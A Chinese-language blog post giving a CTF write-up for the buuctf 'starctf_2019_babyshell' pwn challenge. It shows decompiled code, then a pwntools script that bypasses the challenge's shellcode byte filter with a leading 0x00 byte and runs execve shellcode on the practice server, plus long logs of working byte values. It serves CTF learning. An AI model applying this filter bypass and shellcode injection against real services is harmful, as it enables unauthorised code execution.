美文网首页
buuctf starctf_2019_babyshell

buuctf starctf_2019_babyshell

作者: doinb1517 | 来源:发表于2024-08-26 15:03 被阅读0次

今天做题时候发现一个很有意思的题目,我们输入shellcode,然后满足指定条件之后就可以执行shellcode,一般思路就是在限定条件下拼凑shellcode;但是网上有个很巧妙的方案绕过检查,之后直接使用pwntools内置的shellcode就可以拿到shell,简单记录下这个方案

checksec

checksec starctf_2019_babyshell
[*] '/home/fuzz/Desktop/ctf/starctf_2019_babyshell'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

漏洞函数

main函数如下

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  _BYTE *buf; // [rsp+0h] [rbp-10h]

  sub_4007F8();
  buf = mmap(0LL, 0x1000uLL, 7, 34, 0, 0LL);
  puts("give me shellcode, plz:");
  read(0, buf, 0x200uLL);
  if ( !(unsigned int)sub_400786(buf) )
  {
    printf("wrong shellcode!");
    exit(0);
  }
  ((void (*)(void))buf)();
  return 0LL;
}

sub_4007F8();函数是初始化的,不用管;sub_400786是检查shellcode是不是在这些内容里

__int64 __fastcall sub_400786(_BYTE *a1)
{
  const char *i; // [rsp+18h] [rbp-10h]

  while ( *a1 )
  {
    for ( i = aZzjLovesShellC; *i && *i != *a1; ++i )// ZZJ loves shell_code,and here is a gift:
      ;
    if ( !*i )
      return 0LL;
    ++a1;
  }
  return 1LL;
}

wp

参考这篇文章“汇编语言中0x00的妙用”我们可以使用0x00绕过检查函数,我们需要找到一些包含0x00的shellcode,并且这些shellcode必须不影响后续shellcode执行

link:https://blog.csdn.net/A951860555/article/details/120043354

这里介绍的方法是使用pwn disasm找到这些可用的opcode,很显然这个·004200·不是惟一的方案

pwn disasm -c amd64 004200
   0:    00 42 00                 add    BYTE PTR [rdx+0x0],  al

我们可以使用fuzz的方式测试下究竟哪些字节可以,使用下面的脚本

from pwn import*
context.arch="amd64"
success_list = []
# context(log_level='debug',arch='amd64', os='linux')
p=remote('node5.buuoj.cn',27030)
for first_byte in range(0x01, 0x100):
    try:
        pay=bytes([0x00,first_byte])+asm(shellcraft.execve("/bin/ls"))
        p.sendafter('plz:', pay)
        time.sleep(0.5)
        # p.send('ls')
        # data = p.recv()
        data2 = p.recvlines(10)
        print(f'data:{data2}')
        if b'flag' in data2:
            print(f'success:{hex(first_byte)}')
            success_list.append(first_byte)
        p.close()
    except:
        p = remote('node5.buuoj.cn', 27030)

print(f'success_list:{success_list}')

得到下面的结果

[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xc0
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xc2
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xc4
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xc6
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xc8
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xca
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xcc
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xce
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xd0
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xd2
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xd4
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xd6
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xd8
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xda
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xdc
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xde
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xe0
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xe2
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xe4
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xe6
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xe8
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xea
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xec
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xee
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xf0
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xf2
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xf4
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xf6
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xf8
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xfa
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xfc
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xfe
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done


success_list:['0x2', '0x6', '0xa', '0xe', '0x12', '0x16', '0x1a', '0x1e', '0x22', '0x26', '0x2a', '0x2e', '0x32', '0x36', '0x3a', '0x3e', '0xc0', '0xc2', '0xc4', '0xc6', '0xc8', '0xca', '0xcc', '0xce', '0xd0', '0xd2', '0xd4', '0xd6', '0xd8', '0xda', '0xdc', '0xde', '0xe0', '0xe2', '0xe4', '0xe6', '0xe8', '0xea', '0xec', '0xee', '0xf0', '0xf2', '0xf4', '0xf6', '0xf8', '0xfa', '0xfc', '0xfe']

我们再试试三字节的可用opcode

pay=bytes([0x00,first_byte, 0x00]) + asm(shellcraft.execve("/bin/ls"))

得到下面的结果

data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x42
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x45
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x46
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x47
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x4a
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x4d
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x4e
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x4f
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x52
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x55
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x56
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x57
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x5a
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x5d
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x5e
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x5f
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x62
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x65
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x66
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x67
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x6a
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x6d
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x6e
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x6f
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x72
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x75
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x76
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x77
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x7a
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x7d
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x7e
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x7f

相关文章

  • buuctf

    level2: 简单的栈溢出,覆盖返回地址 ez_pz_hackover_2016 泄露栈地址,ida分析绕过,r...

  • BUUCTF-WEB-Online Tool

    复现地址:https://buuoj.cn/challenges#[BUUCTF%202018]Online%20...

  • BUUCTF Hackworld

    首先用sqlmap跑一跑没有结果尝试输入,测试注入点和过滤 可以发现,只要被过滤了就会显示SQL Injectio...

  • buuctf-upload-labs

    刷了下buuctf搭建的upload-labs,记录一下。 地址:https://buuoj.cn/ Pass 0...

  • BUUCTF_WEB

    [HCTF 2018]WarmUp 打开链接后是一张图片,看看源码提示source.php,进入source.ph...

  • pwn----BUUCTF

    NO.00 pwn1_sctf_2016_sovle exp NO.01 warmup_csaw_2016_sov...

  • 【BUUCTF】MISC WP Ⅱ

    [MRCTF 2020] Hello_ misc 文件名提示修复图片,用 stegsolve 修复红色色道,保存为...

  • BUUCTF re:CrackRTF

    ida打开,看main函数: 可以看到逻辑是输入两次密码,第一次密码验证后,再输入一次第一次输入6位字符,存到pb...

  • BUUCTF crypto WP

    题目地址:https://buuoj.cn/challenges 0x01 MD5 密文e00cf25ad4268...

  • BUUCTF web WP

    0x01 [HCTF 2018]WarmUp f12看到提示进入source.php,看到代码 分析第一段代码,$...

网友评论

      本文标题:buuctf starctf_2019_babyshell

      本文链接:https://www.haomeiwen.com/subject/sdvurdtx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|buuctf starctf_2019_babyshell|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!